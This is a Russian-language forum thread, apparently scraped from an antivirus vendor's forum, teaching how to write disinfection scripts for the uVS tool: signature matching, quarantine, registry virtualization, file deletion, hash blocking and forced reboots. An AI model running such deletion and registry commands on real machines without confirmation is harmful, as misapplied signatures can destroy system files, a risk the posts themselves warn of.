_ НЕДОПУСТИМА ПОДОБНАЯ ЗАЧИСТКА ДЛЯ ОСНОВНЫХ ГРУПП СИСТЕМНЫХ КАТАЛОГОВ ПРИ РАБОТЕ С ОБРАЗОМ_!!!
C:\WINDOWS ;
C:\WINDOWS\system32
и т.д...

Причина: НЕ ПОДКОНТРОЛЬНОЕ ВОЗДЕЙСТВИЕ СИГНАТУРЫ НА ОСНОВНЫЕ СИСТЕМНЫЕ ФАЙЛЫ !!!*
*Что, может привести к потере, таких системных файлов, как : TASKMGR.EXE ; USERINIT.EXE и т.п.

----------------------------------------------

;uVS v4.1.8 [http://dsrt.dyndns.org:8888]

addsgn A7679BF0AA0244834FD4C601898A1261848AFCF689AA7BF1A0C3C5BC5055­9D14704194DE5BBD625CD7E0C09F75C4C32EF4CA383113DA3BE4AC965B2F­C706AB7E 8  Fox .Vir1-2.

adddir %SystemRoot%\Zebra.exe
chklst
delvir
deltmp
delnfr
czoo
restart

czoo  - команда поместить папку zoo ( со всеми файлами ) в архив.
Применяется архиватор на основе 7-zip
------------------------------------------------

Нам нужно посмотреть каталог которого программа не видит - или внешний диск с информацией ?
Можно добавить каталог вручную, а можно написать и выполнить скрипт который это сделает.

Добавление файлов каталога с автоматическим созданием образа.

;uVS v4.1.8 [http://dsrt.dyndns.org:8888]

adddir %Sys32%
crimg

_____________

crimg -  Команда создает полный образ автозапуска.

---------------------------------------------------
12.03.2020 14:37:45, RP55 RP55.]]> http://forum.esetnod32.ru/messages/forum8/topic15785/message108564/ http://forum.esetnod32.ru/messages/forum8/topic15785/message108564/ Thu, 12 Mar 2020 14:37:45 +0300 Полезные программы uVS как стать опытными пользователем этой программы. uVS как стать опытными пользователем этой программы. Обучение пользования программой uVS в форуме Полезные программы.
ПРИМЕР: "дубляж"
Всё тоже самое - но когда файл не один...
_______________________________________________  

;uVS v4.1.8 [http://dsrt.dyndns.org:8888]
zoo %SystemRoot%\Fox.SYS
zoo %SystemRoot%\Foxx.SYS
zoo %SystemRoot%\Foxxx.SYS
sreg
delref %SystemRoot%\Fox.SYS
delref %SystemRoot%\Foxx.SYS
delref %SystemRoot%\Foxxx.SYS
areg

------------------------------------------------------------------


Следует учитывать - что сразу после применения команды Актуализации - "areg"
Компьютер автоматически выполнит перезагрузку!
Что обязательно следует учитывать - при работе с серверными машинами !
т.е - Это, сказка о перезагрузке почтового сервера...  ;)
То, что машина серверная - смотрим ЛОГ +  установленное спец. Программное обеспечение.

** Работа с реестром требует особой осторожности - Отдаётся - только самый минимум из необходимых команд.
Отдавать - другие команды в рамках этого скрипта недопустимо ! ( работаем только с реестром )
* Недопустимо в том плане, что наука ещё не в курсе дела, к каким последствиям это приведёт для всех участников эксперимента !
Когда, есть необходимость в дополнительной очистке - то создаётся новый, дополнительный скрипт лечения !

В случае, где нет Явного объекта ( но есть подозрения ) с которым можно работать применяется такой скрипт:

_______________________________________________
;uVS v4.1.8 [http://dsrt.dyndns.org:8888]

sreg
areg

_______________________________________________

Или такой:
_______________________________________________

;uVS v4.1.8 [http://dsrt.dyndns.org:8888]

breg
sreg
areg

где команда breg применяется первой ( это команда  выполняет бэкап реестра т.е. создаёт\сохраняет его копию )
12.03.2020 14:20:59, RP55 RP55.]]> http://forum.esetnod32.ru/messages/forum8/topic15785/message108563/ http://forum.esetnod32.ru/messages/forum8/topic15785/message108563/ Thu, 12 Mar 2020 14:20:59 +0300 Полезные программы uVS как стать опытными пользователем этой программы. uVS как стать опытными пользователем этой программы. Обучение пользования программой uVS в форуме Полезные программы.
Выше была упомянута: Виртуализация реестра.
Что это и для чего ?

Применяется, при наличие устойчивых форм заражения.
Этот скрипт, работает с применением функции виртуализации  системного реестра.
т.е. Происходит его копирование с последующей заменой\подменой и самопроизвольным отсечением скрытых данных/объектов автозапуска.
Меню: Реестр > "Безопасная виртуализация SYSTEM & SOFTWARE"*
Это команда - "sreg"
После, этой команды, мы в качестве дополнительной меры очистки удаляем ссылку на объект из реестра.
"delref"
delref %Sys32%\Fox.SYS
И, в завершении отдаём команду на Актуализацию реестра.
Меню: Реестр > "Актуализировать SYSTEM & SOFTWARE" = команда "areg"

_______________________________________________


;uVS v4.1.8 [http://dsrt.dyndns.org:8888]

sreg
delref %SystemRoot%\Fox.SYS
areg

-----------------------------------------------------------------

С виртуализацией & Zoo*
*Где Zoo это помещение файла в карантин  :) & ;)

;uVS v4.1.8 [http://dsrt.dyndns.org:8888]

zoo %SystemRoot%\Fox.SYS
sreg
delref %SystemRoot%\Fox.SYS
areg


Нам нужно получить копию вируса ( для отправки в вирусную лабораторию )
применяем команду:  zoo  ( скопировать файл в папку zoo - папка создаётся в каталоге программы )

Да, кстати - есть такая категория, как  без файловые вирусы - они находятся в оперативной памяти и не существуют на диске в виде файла.

------------------------------------------------------------------------
12.03.2020 14:12:00, RP55 RP55.]]> http://forum.esetnod32.ru/messages/forum8/topic15785/message108562/ http://forum.esetnod32.ru/messages/forum8/topic15785/message108562/ Thu, 12 Mar 2020 14:12:00 +0300 Полезные программы uVS как стать опытными пользователем этой программы. uVS как стать опытными пользователем этой программы. Обучение пользования программой uVS в форуме Полезные программы.
В каких случаях рекомендуется применение сигнатуры ?
Применение сигнатуры оправдано тогда, когда тело вируса постоянно меняется и меняется его имя, место положение и контрольная сумма ( SHA1 )
Типа: Worm.RussoTuristo и т.д.
------------------
Если случай заражения более тяжёлый ?
например это Руткит: https://ru.wikipedia.org/wiki/%D0%A0%D1%83%D1%82%D0%BA%D0%B8%D1%82

Если, удаляется файл c расширением Sys.
например: Fox.sys
Смотрим активен этот процесс на данный момент или нет.
Если активен - то оптимальный вариант удаления такого объекта - это загрузка Компьютера в безопасном режиме.* ( F8 )
*Или зачистка _SyS_ объектов, по методу виртуализации реестра.
Необходимо? - предварительное восстановление безопасного режима: SafeBoot ( SafeBoot ) - твик №21.
Соответственно, скрипт выполняется в безопасном режиме.
Сами же скрипты, пишутся по аналогичной/базовой схеме.
**Работа с _SyS_ объектами в безопасном режиме является важным требованием !
так, как в обычном режиме вирус\служба активен и работает его самозащита.
_____________________________________________
Логика процесса лечения такая:
Уничтожается вирус > устраняются последствия его деятельности ( применяем твики ) - после чего зачищаем мусор. ( файлы и хвосты в реестре )
---------------------------------------------------------------
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\­\\\\

Комбинированный скрипт.

Представляет собой сочетание 2-х методов.
В данном случае речь идёт о применении сигнатур и удаления файла по его ( прямому ) пути.
Мы, его решаем удалять по прямому пути: C:\Windows\System32\Fox.EXE
в скрипте этот путь будет указан, как - %Sys32%
Сфера применения: Борьба с устойчивыми к удалению Объектами - повышение эффективности/результативности скрипта.

Логика скрипта: Добавляется сигнатура объекта - после чего происходит удаление по прямому пути - далее отдаются команды на проверку списка и удаления файлов попавших под влияние сигнатуры - затем происходит зачистка от мусора.
И, как всегда совершенно неожиданно мы обнаруживаем, что заблокирован редактор реестра и применяем твик №2
"Разблокировать редактор реестра"
И - в завершение, чтобы изменения вступили в силу перезагружаем PC.
*Команда bl может - как применять так и не применяться.
** В данном случае важное значение имеет последовательность отданных команд.
Пример такого скрипта:
_______________________________________________

;uVS v4.1.8 [http://dsrt.dyndns.org:8888]
;Target OS: NTv10.0
v400c
OFFSGNSAVE
addsgn 4933E7C655AD49809D94AE0674D4128E30786AB689D1C58796609F2F10D6­1745D03C0414751D9E8F60C0E296AD7040123DDC375992D968C40461A42F­64CAB633 8 Fox.Vir
chklst
delvir
delall %Sys32%\Fox.EXE
deltmp
delnfr
regt 2
restart

--------------
delall - удалить файл и ссылки на него.
Значит, что  у нас в карманцах ?
Добавили сигнатуру > проверили список > ( скорректировали при необходимости длину сигнатуры ) и\или добавили команду hide > Убили вирус.
Дополнительно Удалили файл вируса командой: delall  ( ну вот захотелось )
Очистили временные папки Temp от мусора
deltmp - зачистка папок Temp ( и прочее и тому подобное ) ( в них часто пасутся тушки\тела вирусов )
delnfr  - зачищаем PC от ссылок на отсутствующие  объекты.
Сейчас команда delnfr выдаётся по каждому файлу отдельно ( чтобы оператор видел - что и как )
Пример:
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.35.422\PSMACHINE_64.DLL
delref %SystemRoot%\SYSWOW64\COMPPKGSRV.EXE
delref F:\AUTORUN.EXE
Дополнительно > Очистить корзину удалить временные файлы... ALT+Del
В низу будет лог - программа показывает, что именно очищается.
Просмотр лога: Alt+L
12.03.2020 13:40:49, RP55 RP55.]]> http://forum.esetnod32.ru/messages/forum8/topic15785/message108558/ http://forum.esetnod32.ru/messages/forum8/topic15785/message108558/ Thu, 12 Mar 2020 13:40:49 +0300 Полезные программы uVS как стать опытными пользователем этой программы. uVS как стать опытными пользователем этой программы. Обучение пользования программой uVS в форуме Полезные программы.
При работе с сигнатурами ( если невозможно скорректировать\подобрать нужную длину ) применяется команда:  hide ( скрыть файл )

Пример:
hide %SystemRoot%\SYSWOW64\IE4UINIT.EXE

-----------------------------------------------------------------

;uVS v4.1.8 [http://dsrt.dyndns.org:8888]
;Target OS: NTv10.0
v400c
OFFSGNSAVE
addsgn 4933E7C655AD49809D94AE0674D4128E30786AB689D1C58796609F2F10D6­­1745D03C0414751D9E8F60C0E296AD7040123DDC375992D968C40461A42­F­64CAB633 8 Fox.Vir.exe
hide %SystemRoot%\SYSWOW64\IE4UINIT.EXE
chklst
delvir
regt 1
restart


Правой лапой мыши по файлу и в меню: Статус > Скрыть файл.
Файл скрывается из списка и исключается из всех операций _до выхода_ из uVS

Но опять же лень ЭЭЭ !!! т.е. склероз.

Поэтому:
параметр в Settings.ini
раздел:  [Settings]
Пишем:
; Скрывать проверенные файлы со статусом "ВИРУС" если активен белый список.
; (файлы скрываются при запуске функции автоскрипт)
ImgAutoHideVerified (по умолчанию 0) ( 0 - не активно\отключено )
Чтобы работало прописать:
ImgAutoHideVerified = 1
12.03.2020 13:18:33, RP55 RP55.]]> http://forum.esetnod32.ru/messages/forum8/topic15785/message108557/ http://forum.esetnod32.ru/messages/forum8/topic15785/message108557/ Thu, 12 Mar 2020 13:18:33 +0300 Полезные программы uVS как стать опытными пользователем этой программы. uVS как стать опытными пользователем этой программы. Обучение пользования программой uVS в форуме Полезные программы.
Опасная методика... ( не для малоопытных )
У нас, есть Зверь: Fox.EXE
Мы, его решаем удалять с применением сигнатуры.
Для этого в меню данного файла выбираем:
"Добавить сигнатуру в скрипт и вирусную базу"
В результате получаем команду:

addsgn 4933E7C655AD49809D94AE0674D4128E30786AB689D1C58796609F2F10D6­1745D03C0414751D9E8F60C0E296AD7040123DDC375992D968C40461A42F­64CAB633 8 Fox.Vir *

addsgn - команда добавления.
Сама сигнатура: 4933E7C655AD49809D94AE0674D4128E30786AB689D1C58796609F2F10D6­1745D03C0414751D9E8F60C0E296AD7040123DDC375992D968C40461A42F­64CAB633

длина  8 ( длину можно\нужно корректировать, если есть ложные определения\срабатывания. )

имя  Fox.Vir  - Имя "Fox.Vir" можно задать любое.

Сама сигнатура ничего не удаляет она лишь позволяет найти тело вируса и объекты схожие с ним.
Поэтому, нужна дополнительная команда на удаление.
Проверяем по сигнатуре файлы в списке.
Команда: chklst  ( Команда: Проверить список )
Смотрим, какие файлы определены, как вирусы - и нет ли среди них системных файлов или чего другого лишнего !!!
Оставляем - то, что следует удалить -
( путём корректировки/изменения длинны сигнатуры для тех файлов которые ложно попали под неё )

Убедившись, что нет ложных определений - даём команду: delvir  ( команда: Убить все вирусы )

И тут, совершенно неожиданно видим, что заблокирован Диспетчер задач!
Ну...
Такое безобразие совершенно недопустимо - думаем мы!
Совершенно недопустимое безобразие!
И, решаем его разблокировать - применив соответствующий твик №1. ( Дополнительно > Твики )
Команда: regt 1
Вот и скрипт целиком:
_____________________________________________

;uVS v4.1.8 [http://dsrt.dyndns.org:8888]
;Target OS: NTv10.0
v400c

addsgn 4933E7C655AD49809D94AE0674D4128E30786AB689D1C58796609F2F10D6­1745D03C0414751D9E8F60C0E296AD7040123DDC375992D968C40461A42F­64CAB633 8 Fox.Vir.exe

chklst
delvir
regt 1
restart

так, как сигнатуры дело опасное и мы не хотим чтобы uVS сохранила сигнатуру добавляем команду: OFFSGNSAVE ( OFF SGN SAVE )
В чём риск\опасность сохранения сигнатур\ы в базе ?
Опасность в том, что вы не знаете и не видите, что пользователь добавил в свою базу и насколько это было разумно\корректно сделано, не появились ли за  прошедшее время новые программы, или системные файлы ( которые с этими сигнатурами не проверялись )

o Скриптова команда OFFSGNSAVE С момента исполнения запрещает сохранение базы сигнатур до выхода из uVS и дополнительно отключает записи из пользовательской базы сигнатур на время работы скрипта.

;uVS v4.1.8 [http://dsrt.dyndns.org:8888]
;Target OS: NTv10.0
v400c
OFFSGNSAVE
addsgn 4933E7C655AD49809D94AE0674D4128E30786AB689D1C58796609F2F10D6­1745D03C0414751D9E8F60C0E296AD7040123DDC375992D968C40461A42F­64CAB633 8 Fox.Vir.exe

chklst
delvir
regt 1
restart

------------------
chklst  - проверка списка
delvir - удаление вируса.

Но нам же лень всякий раз прописывать команду OFFSGNSAVE.... Или можно забыть и не добавить...

Есть возможность Автоматически добавлять команду в скрипт.

Откройте в тестовом редакторе файл: Settings.ini
и в разделе: [Settings] Пропишите:

; Флаг управляет автоматическим добавлением скриптовой команды
; OFFSGNSAVE
bHlpNoSaveSgn=1 (0 по умолчанию)
12.03.2020 13:07:48, RP55 RP55.]]> http://forum.esetnod32.ru/messages/forum8/topic15785/message108556/ http://forum.esetnod32.ru/messages/forum8/topic15785/message108556/ Thu, 12 Mar 2020 13:07:48 +0300 Полезные программы uVS как стать опытными пользователем этой программы. uVS как стать опытными пользователем этой программы. Обучение пользования программой uVS в форуме Полезные программы.
* При добавление файлов с диска может быть так, что в категории: "Добавлены в ручную " будут отображаться не все фалы - так, как программа может до вас найти некоторые файлы и поместить их в другие категории.
Чтобы увидеть все файлы перейдите в категорию: "ВСЕ"   можно задать поиск\фильтр по букве диска.
12.03.2020 12:39:33, RP55 RP55.]]> http://forum.esetnod32.ru/messages/forum8/topic15785/message108555/ http://forum.esetnod32.ru/messages/forum8/topic15785/message108555/ Thu, 12 Mar 2020 12:39:33 +0300 Полезные программы uVS как стать опытными пользователем этой программы. uVS как стать опытными пользователем этой программы. Обучение пользования программой uVS в форуме Полезные программы.
Вам прислали образ автозапуска созданный в uVS и вы хотите найти вирус и написать скрипт очистки ?

Открываем меню и применяем команды:

Запретить запуск файла (по хешу )
Удалить все ссылки вместе с файлом

;uVS v4.1.8 [http://dsrt.dyndns.org:8888]
;Target OS: NTv10.0
v400c
bl 73FB07A3CC81A5CD049CFCAH956AEF09 39604240
delall H:\Атомный лес.exe
apply


bl - Команда запретить запуск.
73FB07A3CC81A5CD049CFCAH956AEF09 39604240  ( собственно сам SHA1 - идентификатор файла чей запуск запрещаем )
delall - Команда удалить все ссылки вместе с файлом

apply - принять изменения. ( команда оптимизации\ускоряющая выполнение скрипта когда в скрипте много команд и как подтверждение )

---------------------------
Если заблокировали не тот файл ?
В меню есть команда: Снять блокировку запуска файла ( по хешу )
или
Или глобально снять ограничение для всех файлов... применив твик №19. ( снять ограничения по запуску... )
Дополнительно > Твики > Твик №19.

При необходимости в скрипт можно добавить команду
restart
для перезагрузки PC
В каком порядке отдавать команду restart и можно ли её прописать в начале скрипта ?
Да можно ( на современных\актуальных версиях - программа сама определит наличие этой команды и выполнит её только в  конце. )


;uVS v4.1.8 [http://dsrt.dyndns.org:8888]
;Target OS: NTv10.0
v400c
restart
bl 73FB07A3CC81A5CD049CFCAC956AEF09 39604240
delall H:\Атомный лес.exe
apply

Для чего запрещаем запуск по SHA1  ?
Именно этот вирус не сможет запуститься на PC - если его занесут повторно.
* Изменения на запрет\разрешение вступают в силу после перезагрузки PC
Если запустился ? Значит это другой вирус или другой вариант этого, или вы что-то намудрили.
** Если запретить таким образом запуск для большого числа файлов - это может привести к замедлению в работе PC так, как система будет вынуждена проверять объекты.
( сотни или тысячи файлов )
11.03.2020 22:56:01, RP55 RP55.]]> http://forum.esetnod32.ru/messages/forum8/topic15785/message108554/ http://forum.esetnod32.ru/messages/forum8/topic15785/message108554/ Wed, 11 Mar 2020 22:56:01 +0300 Полезные программы uVS как стать опытными пользователем этой программы. uVS как стать опытными пользователем этой программы. Обучение пользования программой uVS в форуме Полезные программы.
Принесли флэшку и на ней может быть вирус ?
Для проверки можно загрузить Систему в безопасном режиме, или использовать Live CD
( Вообще лучше заранее подготовиться и отключить автозапуск - Пуск > Панель Управления > Автозапуск )
https://ru.wikipedia.org/wiki/Autorun.inf
Но если вирус проникает посредством эксплуатации уязвимости Системы ?
Варианты:
1) Выкинуть флэшку.
2) Загрузить Систему в безопасном режиме, или использовать Live CD
-------------
Файл > Добавить в список > Все исполняемые файлы в каталоге ( и указываем диск\букву диска )
Получите список _всех _исполняемых файлов на диске. (.exe; dll и т.д )
И если на диске не должно быть таких файлов то... ( хлопните правой лапой мыши по записи и откроется меню с командами... )
После чего нажмите: Принять изменения ( Клавиша в меню окна )
После этого можно нажать: Обновить Список.


11.03.2020 22:24:40, RP55 RP55.]]> http://forum.esetnod32.ru/messages/forum8/topic15785/message108553/ http://forum.esetnod32.ru/messages/forum8/topic15785/message108553/ Wed, 11 Mar 2020 22:24:40 +0300 Полезные программы uVS как стать опытными пользователем этой программы. uVS как стать опытными пользователем этой программы. Обучение пользования программой uVS в форуме Полезные программы.
Александр Sherr
В uVS есть возможность дефрагментации реестра.
Запустить с максимальными правами  ( Запустить под LocalSystem ( максимальные права, без доступа к сети )
Файл > Дефрагментация реестра.
И где нибудь раз в квартал можно запускать. ( чаще не стоит )
Может поднять скорость работы с реестром, как системных так и сторонних программ.
Копию с помощью uVS делать не советую лучше применять спец софт или самостоятельно копировать с Live CD
C:\Windows\System32\config   файлы каталог с реестром.
11.03.2020 17:30:42, RP55 RP55.]]> http://forum.esetnod32.ru/messages/forum8/topic15785/message108551/ http://forum.esetnod32.ru/messages/forum8/topic15785/message108551/ Wed, 11 Mar 2020 17:30:42 +0300 Полезные программы uVS как стать опытными пользователем этой программы. uVS как стать опытными пользователем этой программы. Обучение пользования программой uVS в форуме Полезные программы.

====quote====
RP55 RP55 написал:
Что всё ?
=============
Та нет)) эта информация очень интересная для меня. Стараюсь ее по немного усваивать.
Я имел ввиду, что буду опять обращаться по поводу чистки и решения каких-то проблем, с которыми не смогу справиться, когда буду чистить свой старый ноутбук)))
11.03.2020 17:01:15, Александр Sherr.]]> http://forum.esetnod32.ru/messages/forum8/topic15785/message108550/ http://forum.esetnod32.ru/messages/forum8/topic15785/message108550/ Wed, 11 Mar 2020 17:01:15 +0300 Полезные программы